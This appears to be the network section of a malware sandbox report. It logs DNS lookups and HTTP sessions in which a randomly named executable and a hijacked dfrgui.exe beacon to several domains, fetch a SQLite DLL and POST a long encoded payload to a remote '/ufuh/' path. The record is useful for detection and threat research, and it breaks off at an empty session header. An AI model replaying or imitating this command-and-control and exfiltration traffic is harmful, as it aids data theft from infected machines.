                                                                                            May 2, 2024 08:27:11.997076988 CEST5482153192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:27:12.094806910 CEST53548218.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:27:12.095403910 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:12.849930048 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:13.614340067 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:15.394332886 CEST5471953192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:27:15.493933916 CEST53547198.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:27:15.494654894 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:16.250765085 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:17.015230894 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:18.795037031 CEST4988153192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:27:18.893646002 CEST53498818.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:27:18.894162893 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:19.651467085 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:20.415868044 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:22.278522015 CEST5499853192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:27:22.374011993 CEST53549988.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:27:22.374599934 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:23.130299091 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:23.894680023 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:29.671816111 CEST5278153192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:27:29.855329990 CEST53527818.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:27:43.305377007 CEST6392653192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:27:43.612377882 CEST53639268.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:27:57.114625931 CEST6551053192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:27:57.229892015 CEST53655108.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:28:06.062151909 CEST138138192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:28:10.821413994 CEST6267253192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:28:10.923126936 CEST53626728.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:28:31.427584887 CEST5647553192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:28:32.003340006 CEST53564758.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:28:47.050195932 CEST4938453192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:28:47.181309938 CEST53493848.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:08.487246990 CEST5484253192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:08.749180079 CEST53548428.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:26.939393997 CEST5810553192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:27.634426117 CEST53581058.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:41.929637909 CEST6492853192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:42.028947115 CEST53649288.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:43.033849955 CEST5739053192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:43.135082006 CEST53573908.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:44.140249014 CEST5809553192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:44.240052938 CEST53580958.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:45.251631021 CEST5426153192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:45.350110054 CEST53542618.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:50.348968983 CEST6050753192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:50.478497982 CEST53605078.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:30:03.719363928 CEST5044653192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:30:03.932369947 CEST53504468.8.8.8192.168.2.22

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            May 2, 2024 08:26:08.124651909 CEST192.168.2.228.8.8.80xc13aStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:26:51.505460024 CEST192.168.2.228.8.8.80x7f30Standard query (0)www.besthomeincome24.comA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:26:56.611654997 CEST192.168.2.228.8.8.80x702fStandard query (0)www.terelprime.comA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:01.625319958 CEST192.168.2.228.8.8.80xd00dStandard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:11.997076988 CEST192.168.2.228.8.8.80x9223Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:15.394332886 CEST192.168.2.228.8.8.80x1442Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:18.795037031 CEST192.168.2.228.8.8.80xd049Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:22.278522015 CEST192.168.2.228.8.8.80xe68Standard query (0)www.99b6q.xyzA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:29.671816111 CEST192.168.2.228.8.8.80xbad2Standard query (0)www.kinkynerdspro.blogA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:43.305377007 CEST192.168.2.228.8.8.80xf4cbStandard query (0)www.xn--matfrmn-jxa4m.seA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:57.114625931 CEST192.168.2.228.8.8.80x3b08Standard query (0)www.primeplay88.orgA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:28:10.821413994 CEST192.168.2.228.8.8.80x7a6aStandard query (0)www.aceautocorp.comA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:28:31.427584887 CEST192.168.2.228.8.8.80x4557Standard query (0)www.mrart.co.krA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:28:47.050195932 CEST192.168.2.228.8.8.80x42eaStandard query (0)www.touchclean.topA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:08.487246990 CEST192.168.2.228.8.8.80x1bd8Standard query (0)www.ibistradingco.comA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:26.939393997 CEST192.168.2.228.8.8.80x6bb2Standard query (0)www.jnkinteractive.co.krA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:41.929637909 CEST192.168.2.228.8.8.80x1486Standard query (0)www.chrisdomond.comA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:43.033849955 CEST192.168.2.228.8.8.80xd063Standard query (0)www.chrisdomond.comA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:44.140249014 CEST192.168.2.228.8.8.80xa6bbStandard query (0)www.chrisdomond.comA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:45.251631021 CEST192.168.2.228.8.8.80xfc39Standard query (0)www.chrisdomond.comA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:50.348968983 CEST192.168.2.228.8.8.80xd9b1Standard query (0)www.riveramayahousing.comA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:30:03.719363928 CEST192.168.2.228.8.8.80xd026Standard query (0)www.exclaimer342200213.netA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            May 2, 2024 08:26:08.222877026 CEST8.8.8.8192.168.2.220xc13aNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:26:08.222877026 CEST8.8.8.8192.168.2.220xc13aNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:26:51.608325005 CEST8.8.8.8192.168.2.220x7f30Name error (3)www.besthomeincome24.comnonenoneA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:26:56.775614023 CEST8.8.8.8192.168.2.220x702fNo error (0)www.terelprime.com66.96.161.166A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:01.725507021 CEST8.8.8.8192.168.2.220xd00dNo error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:12.094806910 CEST8.8.8.8192.168.2.220x9223Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:15.493933916 CEST8.8.8.8192.168.2.220x1442Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:18.893646002 CEST8.8.8.8192.168.2.220xd049Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:22.374011993 CEST8.8.8.8192.168.2.220xe68Name error (3)www.99b6q.xyznonenoneA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:29.855329990 CEST8.8.8.8192.168.2.220xbad2No error (0)www.kinkynerdspro.blog94.23.162.163A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:43.612377882 CEST8.8.8.8192.168.2.220xf4cbNo error (0)www.xn--matfrmn-jxa4m.se194.9.94.86A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:43.612377882 CEST8.8.8.8192.168.2.220xf4cbNo error (0)www.xn--matfrmn-jxa4m.se194.9.94.85A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:27:57.229892015 CEST8.8.8.8192.168.2.220x3b08No error (0)www.primeplay88.orgparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                            May 2, 2024 08:27:57.229892015 CEST8.8.8.8192.168.2.220x3b08No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:28:10.923126936 CEST8.8.8.8192.168.2.220x7a6aNo error (0)www.aceautocorp.comaceautocorp.comCNAME (Canonical name)IN (0x0001)false
                                                                                            May 2, 2024 08:28:10.923126936 CEST8.8.8.8192.168.2.220x7a6aNo error (0)aceautocorp.com198.12.241.35A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:28:32.003340006 CEST8.8.8.8192.168.2.220x4557No error (0)www.mrart.co.krmrart.co.krCNAME (Canonical name)IN (0x0001)false
                                                                                            May 2, 2024 08:28:32.003340006 CEST8.8.8.8192.168.2.220x4557No error (0)mrart.co.kr183.111.183.31A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:28:47.181309938 CEST8.8.8.8192.168.2.220x42eaNo error (0)www.touchclean.top67.223.117.189A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:08.749180079 CEST8.8.8.8192.168.2.220x1bd8No error (0)www.ibistradingco.comwww.ibistradingco.com.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                                                                            May 2, 2024 08:29:08.749180079 CEST8.8.8.8192.168.2.220x1bd8No error (0)www.ibistradingco.com.cdn.hstgr.net154.41.250.58A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:27.634426117 CEST8.8.8.8192.168.2.220x6bb2No error (0)www.jnkinteractive.co.krjnkinteractive.co.krCNAME (Canonical name)IN (0x0001)false
                                                                                            May 2, 2024 08:29:27.634426117 CEST8.8.8.8192.168.2.220x6bb2No error (0)jnkinteractive.co.kr183.111.183.31A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:42.028947115 CEST8.8.8.8192.168.2.220x1486Name error (3)www.chrisdomond.comnonenoneA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:43.135082006 CEST8.8.8.8192.168.2.220xd063Name error (3)www.chrisdomond.comnonenoneA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:44.240052938 CEST8.8.8.8192.168.2.220xa6bbName error (3)www.chrisdomond.comnonenoneA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:45.350110054 CEST8.8.8.8192.168.2.220xfc39Name error (3)www.chrisdomond.comnonenoneA (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:29:50.478497982 CEST8.8.8.8192.168.2.220xd9b1No error (0)www.riveramayahousing.com208.91.197.13A (IP address)IN (0x0001)false
                                                                                            May 2, 2024 08:30:03.932369947 CEST8.8.8.8192.168.2.220xd026No error (0)www.exclaimer342200213.netexclaimer342200213.netCNAME (Canonical name)IN (0x0001)false
                                                                                            May 2, 2024 08:30:03.932369947 CEST8.8.8.8192.168.2.220xd026No error (0)exclaimer342200213.net84.33.215.91A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • universalmovies.top
                                                                                            • www.terelprime.com
                                                                                            • www.sqlite.org
                                                                                            • www.kinkynerdspro.blog
                                                                                            • www.xn--matfrmn-jxa4m.se
                                                                                            • www.primeplay88.org
                                                                                            • www.aceautocorp.com
                                                                                            • www.mrart.co.kr
                                                                                            • www.touchclean.top
                                                                                            • www.ibistradingco.com
                                                                                            • www.jnkinteractive.co.kr
                                                                                            • www.riveramayahousing.com

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.224916466.96.161.166802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:26:56.872559071 CEST467OUTGET /ufuh/?pl=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.terelprime.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:26:56.974514961 CEST1087INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 02 May 2024 06:26:56 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 867
                                                                                            Connection: close
                                                                                            Server: Apache
                                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Age: 0
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.224916545.33.6.223803372C:\Windows\SysWOW64\dfrgui.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:27:01.873955011 CEST248OUTGET /2019/sqlite-dll-win32-x86-3290000.zip HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Host: www.sqlite.org
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            May 2, 2024 08:27:02.009665966 CEST249INHTTP/1.1 200 OK
                                                                                            Connection: keep-alive
                                                                                            Date: Thu, 02 May 2024 06:27:01 GMT
                                                                                            Last-Modified: Thu, 03 Oct 2019 16:46:08 GMT
                                                                                            Cache-Control: max-age=120
                                                                                            ETag: "m5d9625d0s76a84"
                                                                                            Content-type: application/zip; charset=utf-8
                                                                                            Content-length: 486020
                                                                                            May 2, 2024 08:27:02.009699106 CEST1289INData Raw: 50 4b 03 04 14 00 00 00 08 00 2d 09 eb 4e 4f a9 ef 3a 34 05 00 00 cf 15 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 d5 29 26 5d d5 29 26 5d 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 cd 92 dc 28 0c 80 ef 79 9b 64 b6
                                                                                            Data Ascii: PK-NO:4sqlite3.defUT)&])&]ux(ydrTv{sa,3==Ot4'BHB?2ms&GJ!<;`g!1(i)ClW.fk>Q24k;g)o<N56i8gBqA
                                                                                            May 2, 2024 08:27:02.009749889 CEST1289INData Raw: 0b 58 30 eb 84 32 eb 0d 9a a8 35 f9 63 ad 64 b5 c7 55 9c bf ba e4 5a 38 5b 95 89 fe 17 53 e7 4f 12 e6 df d8 e8 bd 7c c3 74 38 d1 e9 99 ed b3 f4 18 61 53 0c eb 9f bf 11 b1 d5 b3 34 3d 1e 0b f6 30 32 d0 ca 66 20 23 d7 3b 90 b6 9b f2 47 e6 64 11 53
                                                                                            Data Ascii: X025cdUZ8[SO|t8aS4=02f #;GdS'jfP?]Zo4+}PK-Nd{"sqlite3.dllUT)&])&]ux|T89I&a0#DJ5h3&$ Qj^E8'i=
                                                                                            May 2, 2024 08:27:02.009819984 CEST1289INData Raw: 30 a2 e4 2f 35 27 c4 38 f9 8a 45 ba 03 73 90 c7 d3 78 fc fa 5c f4 6b 6c e2 d3 5f 47 22 90 08 13 6c 76 fd bd 25 0e 6b 81 2e 46 e4 3d 29 44 85 51 28 69 52 3e ba 05 c1 ab 9b a0 3e c5 1b 89 29 0b d3 5d fe 92 7a 53 14 80 b8 2b 16 ee d5 f9 ac 32 98 a9
                                                                                            Data Ascii: 0/5'8Esx\kl_G"lv%k.F=)DQ(iR>>)]zS+2H7W8k{*+,k7u3$Dzk7~{:p$Q_WDOOJK\:2%Tp 1^6_nL6~P`FC=)X;@Mq6fVG=.
                                                                                            May 2, 2024 08:27:02.009924889 CEST1289INData Raw: ee 6a c0 2d 2a a8 4d c4 34 31 61 a0 53 ee 30 0d 1c 97 03 ed 26 5a 78 92 70 64 09 2f 25 c8 7b 23 ee 53 e2 77 e4 c0 7e 13 e3 57 a5 79 d0 2c a9 db 2d ed 59 77 23 f5 b5 73 9d 42 bd dd 18 06 d1 66 f1 f5 b8 7d dd e5 3d ae 0e c0 7d cc bd 5a ea 99 4a da
                                                                                            Data Ascii: j-*M41aS0&Zxpd/%{#Sw~Wy,-Yw#sBf}=}ZJ+nK)a{ONB}=S-W5.5W'|JVq$faS*v{RxeVC\u[S>Wxsb^,h<7))
                                                                                            May 2, 2024 08:27:02.010009050 CEST1289INData Raw: 8e cf 4b 42 9f fb 42 9d f7 3c bf ef 42 e9 e7 33 db 9a 16 66 d9 d7 fd 8b c1 23 34 d1 45 c8 62 4e 21 ed ae 8e 81 8b f4 71 d9 56 73 42 d2 60 d6 1f de 92 f5 86 60 32 95 4f 87 19 3c d4 a8 5a e4 33 09 42 7d 9e c5 76 78 50 0e 71 5a 06 69 57 d6 72 1f 07
                                                                                            Data Ascii: KBB<B3f#4EbN!qVsB``2O<Z3B}vxPqZiWrPp+(/Os76%x@j?MzMy)alun4B^IEK~x}"UK9A%9sYNnCRyr&7I+"N"[pcIAq&`cS
                                                                                            May 2, 2024 08:27:02.010078907 CEST1289INData Raw: 3b 19 9e 1e 81 16 4f 2a 93 2b e6 98 2a 12 a8 a7 00 e6 b1 98 7a b3 e5 4c 93 b8 40 f1 87 5a 7c 21 5d a0 ee 66 da e4 09 3d 6c df cd a7 32 4e c3 eb a4 d9 02 9c e3 b1 a9 81 6e dc 11 90 38 ca cd 11 f9 58 84 cc 47 7c e3 d5 e1 e4 44 13 22 96 36 29 4b fe
                                                                                            Data Ascii: ;O*+*zL@Z|!]f=l2Nn8XG|D"6)Kt#C6HOnTZUB(GLdk7iL}THE'*XVi_,N,0sb^YZ)!C(IKlWJcLw!pC<ws@yV
                                                                                            May 2, 2024 08:27:02.011259079 CEST1289INData Raw: 8a e9 4b 80 19 57 fc 83 6a 67 18 39 c5 41 ea bf 1a bb ed a5 7d 6e fa dc 91 f6 79 49 a7 fa 04 f2 61 be 10 f1 77 9f 7e 01 c4 c7 ce d3 e1 cf 3b 37 ce 93 6e 23 cd e4 18 ec 62 5b 8e 61 c3 e4 48 64 6d 9c 3c f2 75 f9 54 62 01 66 13 b0 b1 ec 66 cf 03 72
                                                                                            Data Ascii: KWjg9A}nyIaw~;7n#b[aHdm<uTbffr+M5a(L/< fYEC5Ig~}@y7SJQ&o9>iIpgvCd/5tV#Lh\_N:b;]7&72zN#
                                                                                            May 2, 2024 08:27:02.011342049 CEST1289INData Raw: d5 e5 be 14 98 b8 7a d8 99 4b 2b dd fc 84 05 bc f6 8f 9b 79 2e d5 94 e8 05 a4 ea f5 10 af 53 37 1e 8b b6 a5 d9 e3 30 b1 ad a7 24 aa 3b 2b 06 5e 74 a0 19 52 78 29 8f 56 58 49 d3 8e 6a b4 f7 19 54 ff 2b c4 b4 f9 53 76 10 fd fd f5 10 9e 04 c0 c4 5f
                                                                                            Data Ascii: zK+y.S70$;+^tRx)VXIjT+Sv_l]>@LM%^~i7SmLi-A8V6K^ud~+Uqi,1mj;=08l)_jzZWh Sov9no89ab:Rmrp8Nkx,Y:R*
                                                                                            May 2, 2024 08:27:02.011445045 CEST1289INData Raw: dc 68 d6 4e 34 86 cc ae 0e f5 3e d8 ce 40 d6 cd 90 f7 d8 c6 59 5e 91 83 c8 46 d9 50 eb 08 5b f7 12 be 8c da 72 a1 04 2e eb 92 9e c0 6d c0 d7 95 65 d9 56 48 b3 48 a1 4a 17 a4 22 fb e4 80 fd 26 95 f2 bf 52 cb bb 74 94 53 c5 04 af 76 28 c6 9a c0 36
                                                                                            Data Ascii: hN4>@Y^FP[r.meVHHJ"&RtSv(68&l+otOy|C2"J%CO''_&z~Kft"lx~i!}}%"(d(kj*G57j)Y73mH9s"<If{
                                                                                            May 2, 2024 08:27:02.145319939 CEST1289INData Raw: 62 d0 73 ed fd 2d 67 4c 9e 20 f0 09 ef a3 da fb ca 7b b0 c8 7c dd d2 24 c8 c1 0c 96 f0 56 90 c6 a3 a1 22 7d 14 cd a7 81 85 ed 66 02 73 62 73 e2 61 fa 28 de f3 48 c2 a4 9f 23 d2 bb e8 02 be 7f 8f 55 9c f9 6e 2a 20 b3 af bb 85 5d 03 a6 8f 3a 30 07
                                                                                            Data Ascii: bs-gL {|$V"}fsbsa(H#Un* ]:0biD<%R&]0VY/h*]ZvQI/9>z0GhdWG@sa+iH]h,8fJlI<^ C+\P=^>;];Q<+FX


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.224916694.23.162.163802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:27:30.028881073 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.kinkynerdspro.blog
                                                                                            Origin: http://www.kinkynerdspro.blog
                                                                                            Referer: http://www.kinkynerdspro.blog/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 32 71 62 32 65 4c 53 47 74 5a 47 78 57 6e 4b 49 33 78 68 48 77 41 32 4b 4e 45 67 65 67 34 59 49 54 43 56 57 45 79 7a 75 4c 39 47 75 77 37 69 54 6e 77 56 72 2f 78 59 6b 6c 6d 54 6f 62 67 6e 4b 59 70 51 57 61 57 67 39 76 57 63 4f 51 68 57 38 5a 67 55 73 4f 52 72 58 69 39 39 38 2b 56 70 63 78 63 6e 4d 4f 71 52 62 32 31 41 31 41 69 7a 5a 69 4f 53 43 35 30 52 44 54 57 41 67 6d 44 6b 46 49 39 76 58 4c 39 50 56 2f 41 79 4d 64 57 63 30 75 42 64 2f 4a 50 70 32 47 56 75 6b 62 43 6b 32 68 6f 67 75 6d 33 70 51 42 4c 62 4d 66 43 46 62 6b 77 4c 4f 36 69 4b 6f 46 4a 53 70 65 64 37 4a 72 73 58 67 4c 6c 61 57 4d 6d 47 66 53 4e 2b 4c 36 7a 63 78 37 58 33 39 35 55 6b 46 53 2b 69 41 4f 6d 44 58 62 33 6b 66 30 62 56 71 32 51 49 59 6e 57 4b 76 74 57 48 45 48 76 51 39 73 43 52 77 78 66 68 6a 4b 4d 6c 7a 6f 48 5a 47 75 66 78 39 50 58 52 36 78 71 44 39 56 6f 72 51 43 4d 35 52 78 31 71 4d 73 73 4f 61 51 6e 43 6b 67 63 4b 70 43 6f 73 69 69 54 69 44 69 33 76 5a 43 4f 70 39 41 30 [TRUNCATED]
                                                                                            Data Ascii: pl=S8onh96WtuR/E2qb2eLSGtZGxWnKI3xhHwA2KNEgeg4YITCVWEyzuL9Guw7iTnwVr/xYklmTobgnKYpQWaWg9vWcOQhW8ZgUsORrXi998+VpcxcnMOqRb21A1AizZiOSC50RDTWAgmDkFI9vXL9PV/AyMdWc0uBd/JPp2GVukbCk2hogum3pQBLbMfCFbkwLO6iKoFJSped7JrsXgLlaWMmGfSN+L6zcx7X395UkFS+iAOmDXb3kf0bVq2QIYnWKvtWHEHvQ9sCRwxfhjKMlzoHZGufx9PXR6xqD9VorQCM5Rx1qMssOaQnCkgcKpCosiiTiDi3vZCOp9A0mfyqWuXqeMyuOHd9aFLQYFq0ZfNiPhZDVabL9o1k6Sy4RShe0aOqWYNsXIAxVsVJ5jQidcIww9K0uYI6nbr/QRXFRS31On9a59ERp4xDBfnW5gLHSkkVz8k6UFeBhpo/6tHzlv8bHTaZ6kkXFcRnzyjcYQS2Cq1EUBPx7VFgqjnmVNt7PvOgxauqQE/soFQFT0MZmiqZJcj099bXK+sLyEvRARbHnaaiUfbcSQiIaP1mX/HBcdnCGC9T3oeJaEs/jcmMtoSf9EzzB2SB7WDglbG3h6CLw5LuCZSjW4reiuLGCWBtoS3AnjH6AwrfOWU/KUa7Zmj2cq8W1kNxYzfY2iQPpeM1nrID4kpI1308/+PsBOdXzMxpELOmttmxNfjMKcCzjjdrDadQLX38yoIEtGjflKN9tEzATE77AEHs7qP6ae9iiB3pcfwCR61tQmgQopch+VrVNvIn9PYmqhEfnXu/sFRW1/+77qiJee3kzUDAPhKbgvHdQ/Rhhddt+uNnsu9oUnjXkPup5K360RZSaZB8NDf6nt6/ZbWeY7W9VfgJwZgBjqAcghjg1eVl3Lq6pKt01tAqz9qmJsFU0dn6bA/F1IccVFUvMrFH/JX/rhMzkHCFbfyFpS0t7jqoWNPf90AsRDau0G8eF2y09/0DEUTmO7LFsMHhg7 [TRUNCATED]


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
